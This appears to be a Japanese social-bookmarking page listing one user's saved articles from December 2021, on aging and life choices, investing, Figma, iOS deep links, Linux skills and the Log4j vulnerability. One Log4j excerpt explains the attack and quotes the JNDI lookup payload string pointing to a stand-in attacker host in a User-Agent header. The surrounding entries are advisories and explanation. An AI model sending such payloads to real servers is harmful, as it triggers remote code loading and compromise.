タグ

2021年12月14日のブックマーク (15件)

  • 高齢者に接していると、若い時にもっと楽しんでおいたほうがいい、と強く思います。

    貯蓄や投資ばかり意識するより、「若いときにお金をどう使うか」を考えたほうがいい 参考リンク:50歳以降の男性的な生き方に対する雑感(ICHIROYAのブログ2021/11/16) そうか、ICHIROYAさん、古着屋、廃業してしまったのだなあ……そして、もう62歳になられたのか…… かなり長い間読んでいながら、最近はあまりブログを訪れる機会がなかったので、なんだか突然いろんなことが押し寄せてきたように感じました。 参考リンク:【読書感想】僕が18年勤めた会社を辞めた時、後悔した12のこと(琥珀色の戯言) 僕がこのを読んでから、もう20年くらい経ったのか……あれ?経ってない。 これ、2015年に上梓されただったのか……まだ6年前くらいだったんですね。 ということは、ICHIROYAさんは、50代半ば、起業してから10年以上経ってから、このを書いておられたのです(すみません、年齢はあまり

    高齢者に接していると、若い時にもっと楽しんでおいたほうがいい、と強く思います。
  • 50歳以降の男性的な生き方に対する雑感 - ICHIROYAのブログ

    僕は20年間、会社員をして、40歳で独立して古着屋を始め、62歳で会社を廃業して引退しました。 男性のマジョリティーであろう価値観で生きてきた人間です。 この文章は、「男性的な価値観で生きている人」を対象に書きますが、表記が面倒なので、以降、「男性」もしくは「男」と略して書きます。 男は、40歳頃に中年の危機を迎えます。周囲に負けまい、なにものかになるんだと志して遮二無二働き、大多数は、なにものにもなれないと気づきます。そこで、転職したり、僕のように独立したりして、「なにものにもなれなくても、自分独自のコアを大切にする生き方」を模索します。そうやって、なんとか人生に折り合いをつけて、中年の危機を乗り越えます。 が、50歳、60歳になると、次の危機がやってきます。 定年でやることがない、孤独だ……そんな話はよく聞きます。が、古着の商売をしていた僕は、歳を取れば知識が増えるだけで、生涯現役でや

    50歳以降の男性的な生き方に対する雑感 - ICHIROYAのブログ
  • 【図解】Log4jの脆弱性 CVE-2021-44228 (Log4shell or LogJam) について

    JNDI とはJava Naming and Directory Interface という、Java アプリケーションが DNSLDAP 等のサービスを利用するための汎用的なインタフェース (ライブラリ) です。 Log4j と JNDI lookupApache Software Foundation が開発した、Java ベースのロギングに関するライブラリです。JNDI lookup という機能があり、書き込んだログの一部を自動で変数化します。今回はこの機能が悪用されています。 CVE-2021-44228 の攻撃シーケンスの例 攻撃者は脆弱性をトリガーするために http ヘッダの User-Agent に ${jndi:ldap://attacker.com/a} という文字列を埋め込み、http リクエストを送信します。脆弱性のあるサーバの Java App はその通信を

    【図解】Log4jの脆弱性 CVE-2021-44228 (Log4shell or LogJam) について
  • Google Cloud recommendations for Apache Log4j 2 vulnerability | Google Cloud Blog

    Google Cloud recommendations for investigating and responding to the Apache “Log4j 2” vulnerability Editor's note: This post was updated on 1/14/21 at 1:12pm PST. In this post, we provide recommendations from the Google Cybersecurity Action Team and discuss Google Cloud and Chronicle solutions to help security teams to manage the risk of the Apache “Log4j 2” vulnerability (CVE-2021-44228 and CVE-2

    Google Cloud recommendations for Apache Log4j 2 vulnerability | Google Cloud Blog
    yuki_2021
    yuki_2021 2021/12/14
    Log4jをv2.15.0へアップグレードするか、「No Lookups property (log4j2.fatameMsgNoLookups)」をtrue
  • “ログソフト”に深刻なぜい弱性 IPA 早急な対策呼びかけ | NHKニュース

    世界中で広く使われている、サーバーの操作記録などを残すためのソフトウエアに、深刻なぜい弱性が見つかり、悪用されると情報を引き出されたり、最悪の場合、サーバーの管理者権限を奪われたりするおそれもあるとして、情報セキュリティー機関が、ソフトを使用している事業者などに対して早急に対策をとるよう呼びかけています。 ぜい弱性が見つかったのは、コンピューターのサーバーの操作履歴などの記録を残すために使われている「Apache Log4j2」と呼ばれるソフトウエアです。 情報処理推進機構=「IPA」によりますと、このソフトウエアは、一般に公開され無償で利用できますが、世界中で広く使われているプログラミング言語「Java」で開発されたシステムなどに組み込まれていて、ぜい弱性が悪用されると、コンピューターウイルスを送り込まれたり、外部に情報を引き出されたりするほか、最悪の場合、サーバーの管理者権限が奪われる

    “ログソフト”に深刻なぜい弱性 IPA 早急な対策呼びかけ | NHKニュース
  • Figmaでグラフィックデザインをする際に使用しているプラグインや機能を紹介します|Yang

    🙏 注意 🙏 この記事で紹介しているプラグインの仕様は2021年時点のものです。最新版とは仕様が異なる場合があります。 どうも!Yangと申します。 Feedforceという事業会社で、データフィード管理SaaSのプロダクトデザイナーをやっています。 この記事は「Figmaアドベントカレンダー」13日目の記事です🎄 昨日の投稿は@aizawa213さんの「Figmaプロトタイプ入門」でした🥂 最近、苦手なグラフィックデザインの練習も兼ねてFigmaでちょっとしたグラフィック制作をはじめてみました。 今回はその制作過程で使用しているプラグインやFigma自体の機能を、具体例とともに紹介させていただこうと思います。 他の方が技術的かつとても有益な記事を書かれている中、勢いで書き上げた拙い文章かつn番煎じな内容で大変恐縮ですが、少しでも誰かの役にたてば幸いです・・・。 実際の制作物このレ

    Figmaでグラフィックデザインをする際に使用しているプラグインや機能を紹介します|Yang
  • iOS14でUniversal Links対応することになった人が見る記事 - Qiita

    Universal Linksとは urlからアプリをシームレスに起動できる機能のことです。 ディープリンクとの大きな違いは確認のダイアログなしでアプリに遷移できることです。 UX上の利点や特徴などは以下の記事で詳しく解説されています。 モチベーション 今回Universal links対応をiOS側の担当者として調査から実装までやりました。 しかしこれが曲者で、 OSごとに対応方法が異なっていたり、 事前に対策を打たないと特定の環境で動作確認できなかったり 挙動にOS差分があって中々原因に気づけなかったはまりどころがあったり、 などなど結構ハマってしまいました。。。 そこで、同じようにiOS14からUniversal Linsに対応する方が苦しまなくてよいようにするため、以下の情報を記事にしました。 iOS14時点のUniversal Links対応手順 Universal Linksの

    iOS14でUniversal Links対応することになった人が見る記事 - Qiita
  • 【iOS】Firebase Dynamic Linksでアプリが起動しない

    Firebaseダイナミックリンクを使うと、1つのURLで複数の遷移先を設定できて、ユーザーごとに適切な制御ができます。ダイナミックリンクによるアプリ内の画面遷移などの制御を除けば、プログラミングなしの設定のみで簡単に実現することが可能です。 例えば、以下のようなパターンです。 iOSのブラウザでダイナミックリンクをタップすると、アプリストア(AppStore)に移動するiOSのブラウザでダイナミックリンクをタップすると、アプリ起動する(インストール済の場合)Androidのブラウザでダイナミックリンクをタップすると、アプリストア(Playストア)に移動するAndroidのブラウザでダイナミックリンクをタップすると、アプリ起動する(インストール済の場合)PCのブラウザでダイナミックリンクをタップすると、アプリのランディングページに移動する ディープリンク(DeepLink)やユニバーサルリ

    【iOS】Firebase Dynamic Linksでアプリが起動しない
  • 「Log4j」の脆弱性を突く攻撃手段の情報共有は違法? 日本ハッカー協会に聞いた

    文字列を記録させるだけで任意のリモートコードを実行できるゼロデイ脆弱性があることが明らかになった、Javaのログ出力ライブラリ「Apache Log4j」。12月10日に話題になってから、Javaを使ったシステムに関係するITエンジニアは対応に追われている。一方で、その脆弱性を突く具体的な手段をネット上で共有する行為は「不正指令電磁的記録に関する罪に問われるのではないか」と議論が起きている。 「罪に問われる可能性はある」 問題解決のためとはいえ、攻撃手段となりうる情報の共有は罪に問われるのか。日ハッカー協会の杉浦隆幸理事に聞いたところ「log4jの脆弱性をつく攻撃を実際に実行して、成功してしまうと不正アクセス禁止法に該当する」と前置きした上で「そのコードを共有する行為は不正指令電磁的記録に関する罪に問われる可能性は十分にある」と指摘する。 不正指令電磁的記録に関する罪とは、コンピュータウ

    「Log4j」の脆弱性を突く攻撃手段の情報共有は違法? 日本ハッカー協会に聞いた
  • 「進化の奴隷」にならず「幸福」に生きるための秘訣

    人間は「進化の奴隷」ではない このたび、拙著『21世紀の道徳』を上梓した。書では、倫理や幸福という問題について、哲学と心理学という2つの学問を両輪としながら考察している。このには、古代ギリシアのプラトンから「最も影響力のある現代の哲学者」とも呼ばれるピーター・シンガーまで、さまざまな時代の哲学者たちが登場する。そして、科学的な心理学の知見によって、哲学者たちの主張が補完されているのだ。 とくに参考にしているのが、人間の心理メカニズムは先史時代の狩猟採集民たちが生きてきた環境に適応するために進化してきたものであると仮定する、「進化心理学」だ。書では、「わたしたちにはなぜ道徳に関する感情や利他心が備わっているのか」「わたしたちはどのように生きれば幸福を得られるか」という問題について、進化の観点から検討している。 学問としての進化心理学は20世紀の後半に発展した。それから多くの学者や著作家

    「進化の奴隷」にならず「幸福」に生きるための秘訣
  • 老いによる限界は避けられないけれど、全力疾走する中年として今を生きたい。

    生物学的な加齢と社会的な加齢によって、人生のシーンはどんどん変わっていく。 30代になった頃も、40代になった頃も、目の前に現れた新しい状況や展望に驚かずにいられなかった。 とはいえ驚いてばかりでは、人生の新しいシーンに振り回されるというか、消極的にしか対処できない。 だから私はいつも年上の人々の言葉のなかに人生の未来予測に役立ちそうなヒントを探し、それをあてにしてきた。 でもって、最近立て続けに年上の人のありがたい言葉が視界に入ってきた。 これから紹介する2つのテキストはどちらも参考になるもので、みようによっては、「あなたならどうする?」と問いかけているようにも読める。 これらを皆さんと共有したうえで、今の生を振り絞ること、生き急ぐことについて所感を書いてみたい。 1.「中年になって起業したあの人が引退するだなんて」 はじめに、私が読んで衝撃を受けたブログ記事を紹介する。 50歳以降の男

    老いによる限界は避けられないけれど、全力疾走する中年として今を生きたい。
    yuki_2021
    yuki_2021 2021/12/14
    なんか、今アラフォーぐらいなんだけど、大体着地点が見えてきてしまってるって感じなんだよな。今後の人生を考える上で参考にする。
  • Adobe、無料の「Creative Cloud Express」投入。デザインの心得がなくても高品質コンテンツを簡単に作成可能に

    Adobe、無料の「Creative Cloud Express」投入。デザインの心得がなくても高品質コンテンツを簡単に作成可能に
  • インデックス投資で億りました

    新刊に書いたのでいずれ明らかになるため自分で言います。億りました。 資産1億円を達成したということです。当ブログの読者さまならご存知のとおり、ほぼインデックス投資(国際分散投資したインデックスファンドの積み立て投資)だけでここまできました。 私のポートフォリオの期待リターンは年率+4.4%、リスク(標準偏差)は13.6%です。運用期間は20年弱で、実際のリターンを計算したら年率+6%でした。平凡な実績ですが、期待リターンよりは少し良い方にふれたようです。良い方にふれたのは、たまたまここ数年の相場状況が良かったからだと思います。こんなのは計算期間によってころころ変わるのであまり意味はありません。 それよりも、リスク水準を自分のリスク許容度の範囲内におさめることを重視して、同じ資産配分で毎月1回ひたすら積み立ててきました。年1回程度リバランスをしてきましたが、計算してみたらあまり変わっていなか

    インデックス投資で億りました
  • 「Linux」できますって具体的に何を指している?というお話 - workaholic-blog

    こんにちは、Workaholicです。 Twitterで以下の発言したら定義がどうのって話になりましたので個人的に思う「Linux出来ます」という事について、SIerの採用担当としての目線でお話をしようと思います。 「Linux出来ます」って言ってるのに ・文字コードの概念知りません。 ・Shell作れません。 ・構築作業経験ありません。 ・基的コマンドのみ知ってます 舐めてんのかって思う🥺#駆け出しエンジニアと繋がりたい #プログラミング初心者 #エンジニアと繋がりたい — Workaholic@悪徳インフルエンサー煽りマン (@32768Sf) December 12, 2021 ・安易な「出来ます」は危険Linuxに限った話ではありませんが、技術関連の界隈で「出来ます!」と発言することはその道のひた走るトッププロでもない限り危険です。私もIT業界は長いですが「出来る」なんてことは

    「Linux」できますって具体的に何を指している?というお話 - workaholic-blog
    yuki_2021
    yuki_2021 2021/12/14
    シェルスクリプトは書けるけどshellは作れんな
  • 合計金額18,100円(税別) - セミサメユメ

    yuki_2021
    yuki_2021 2021/12/14
    これからもドゥンドゥン本を積もうぜ? / 個人的には辞典類も電子辞書が好みですね。物書堂の類語辞典のアプリを使ってます。